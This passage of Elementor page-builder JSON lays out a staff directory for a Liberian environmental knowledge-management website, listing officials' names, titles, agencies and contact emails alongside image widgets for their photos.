href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"96ae29e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/jwiagbe.png\",\"id\":3633}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9ff3a4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/reeves.png\",\"id\":3635}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1c050c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/willabo.png\",\"id\":3636}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ddcc6df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/kullie.png\",\"id\":3637}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a688b4\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br 